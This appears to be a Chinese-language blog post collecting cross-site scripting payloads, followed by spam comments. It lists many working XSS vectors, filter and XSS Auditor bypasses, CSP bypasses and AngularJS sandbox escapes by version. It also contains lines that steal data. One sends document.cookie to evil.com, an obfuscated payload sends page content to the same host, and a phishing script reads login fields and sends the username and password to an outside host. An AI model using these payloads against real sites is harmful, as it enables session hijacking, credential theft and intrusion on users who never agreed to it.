4
9月

Tittle: XSS收集贴

3 作者:admin

浏览器安全一 / Chrome XSS Auditor bypass

HTML5 Security Cheatsheet

XSS Polyglot Challengev2

eval('ale'+'rt(0)'); Function("ale"+"rt(1)")(); setTimeout('ale'+'rt(2)'); constructor.constructor("aler"+"t(3)")(); [].filter.constructor('ale'+'rt(4)')(); top["al"+"ert"](5); new Function`al\ert`6``; top[8680439..toString(30)](7); top[/al/.source+/ert/.source](8); top['al\x65rt'](9); setInterval('ale'+'rt(10)'); open('java'+'script:ale'+'rt(11)'); location='javascript:ale'+'rt(12)'; Set.constructor('ale'+'rt(13)')(); Set.constructor`al\x65rt\x2814\x29`; <svg/onload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;// <svg•onload=alert(1)> <svg><script>alert(1)<b>test</b>(Edge) <applet onerror=alert('xss')> (IE5-11、Edge) <div onfocus=alert('xx') id=xss style=display:table>(IE8-11) <details ontoggle=confirm(1)>(chrome only) <input type="search" onsearch=prompt(1) autofocus>(chrome only) <input type="text" value="@saamux" onclick="window.onerror=alert;throw 'This is Vulnerable'"> <video><source onerror=javascript:prompt(911)> <base href="data:\"><link rel=import href='q,<script>alert(1)</script>'>(chrome only) <frameset/onpageshow=alert(1)> <x id=y style=transition:1s tabindex=1 onwebkittransitionend=alert(1)>(chrome only) <meta http-equiv=refresh content="0;url=data:,<script>parent.location.replace('javascript:alert(document.domain)')</script>">(Edge uXSS) ?xss=<link rel=import href=https:html5sec.org/ (chrome-http) ?xss=<meta http-equiv=Content-Security-Policy content=upgrade-insecure-requests><link rel=import href=http:html5sec.org/ (chrome-https) <div%20style=-webkit-user-modify:read-write%20onfocus=alert(1)%20id=x>#x <div%20style=-webkit-user-modify:read-write-plaintext-only%20onfocus=alert(1)%20id=x>#x <div style="-ms-scroll-limit:1px;overflow:scroll;width:1px" onscroll=alert('xss')>(MSIE10-11) <div style=writing-mode:tb;overflow:scroll onscroll=alert(1)>(通杀) <svg/%00%0a%ff/+X/%ff.\/onload=c&#111;nfirm(document.domain)<h1></h1>/> <meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter><br> <meter onmouseover="alert(1)" 【<object allowscriptaccess=always><param name=url value=https://b.cp0.win/xss.swf>或者<object allowscriptaccess=always><param name=code value=https://l0.cm/xss.swf>】 String['fromCharCode']、document['cookie'] <svg><animate href=#x attributeName=href values="&#x3000;javascript:alert('XSSAuditorBypassWithSVGAnimationsAgain')"/><a id=x><circle r=100> <img src="data:image/svg+xml,<meta xmlns='http://www.w3.org/1999/xhtml' http-equiv='Set-Cookie' content='X' />">【火狐下】 <button onauxclick=alert(1)>Right-Click Me</button>【火狐下】 svg xss向量(保存为.svg) https://pastebin.com/raw/KwYNFrCz <////--><details open ontoggle=confirm(1)> ​​​​ 不带alert等字符的payload document.write`${Array.call`${atob`PA`}${`l`}${`i`}${`n`}${`k`}${atob`IA`}${`r`}${`e`}${`l`}${atob`PQ`}${atob`Ig`}${`p`}${`r`}${`e`}${`f`}${`e`}${`t`}${`c`}${`h`}${atob`Ig`}${atob`IA`}${`h`}${`r`}${`e`}${`f`}${atob`PQ`}${atob`Ig`}${`h`}${`t`}${`t`}${`p`}${atob`Og`}${atob`Lw`}${atob`Lw`}${`evil`}${atob`Lg`}${`com`}${atob`Og`}${atob`Lw`}${Math.random}${`_`}${escape.call`${document.getElementsByTagName`link`.item.import.body.innerText}`}${atob`Ig`}${atob`Pg`}`.join}`;

【CSP bypass】

Collection of CSP bypasses

Evading CSP with DOM-based dangling markup

CSP does not prevent meta redirects. (<meta http-equiv="refresh" content="1; url=...) <script>window.location = "httx://evil.com/" + document.cookie</script>#csp bypass xss auditor绕过 <br>%00%00%00%00%00%00%00<script>alert(1)</script> <embed/src=/brute//alert(document.domain)><base/href=javascript:%5C

在<input>标签时,如果type在可控点后面,直接指定type即可绕过,否则只能是accesskey="X" onclick="alert(1)">然后点击ALT+SHIFT+X触发,或者x" type=image src=http://aaaa.com x可向外发起请求通过referer获取敏感信息

高于"(双引号)优先级的标签: <!-- <iframe> <noframes> <noscript> <script> <style> <textarea> <title> <xmp>

【AngularJS Sandbox Bypass Collection】 ##DOM based AngularJS sandbox escapes Versions 1.3.0 - 1.5.7: {{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,alert(1),a')}} Versions 1.2.20 - 1.2.29: {{a="a"["constructor"].prototype;a.charAt=a.trim;$eval('a",alert(alert=1),"')}} Version 1.2.19: {{c=toString.constructor;p=c.prototype;p.toString=p.call;["a","alert(1)"].sort(c)}} Versions 1.2.6 - 1.2.18: {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}} Versions 1.2.0 - 1.2.5: {{a="a"["constructor"].prototype;a.charAt=a.trim;$eval('a",alert(alert=1),"')}} xss直接钓鱼 javascript:user=document.getElementsByClassName('form-control required')['userName'].value;pw=document.getElementsByClassName('form-control required')['password'].value;alert('thanks, i'll send'+user+':'+pw+' to meowz.h4x.tv now :)');document.location='http://meowz.h4x.tv/?log='+user+':'+pw

评论


回复内容Hello Web Admin, I noticed that your On-Page SEO is is missing a few factors, for one you do not use all three H tags in your post, also I notice that you are not using bold or italics properly in your SEO optimization. On-Page SEO means more now than ever since the new Google update: Panda. No longer are backlinks and simply pinging or sending out a RSS feed the key to getting Google PageRank or Alexa Rankings, You now NEED On-Page SEO. So what is good On-Page SEO?First your keyword must appear in the title.Then it must appear in the URL.You have to optimize your keyword and make sure that it has a nice keyword density of 3-5% in your article with relevant LSI (Latent Semantic Indexing). Then you should spread all H1,H2,H3 tags in your article.Your Keyword should appear in your first paragraph and in the last sentence of the page. You should have relevant usage of Bold and italics of your keyword.There should be one internal link to a page on your blog and you should have one image with an alt tag that has your keyword....wait there's even more Now what if i told you there was a simple Wordpress plugin that does all the On-Page SEO, and automatically for you? That's right AUTOMATICALLY, just watch this 4minute video for more information at. <a href="http://www.SEORankingLinks.com">Seo Plugin</a> seo http://www.SEORankingLinks.com/
来自seo(2016-01-30 09:54:39)
回复内容xkdNFw http://www.LnAJ7K8QSpkiStk3sLL0hQP6MO2wQ8gO.com
来自Barnypok(2017-07-08 09:23:35)
回复内容5DTvP7 https://goldentabs.com/
来自GoldenTabs(2018-01-09 07:45:05)





来说点什么吧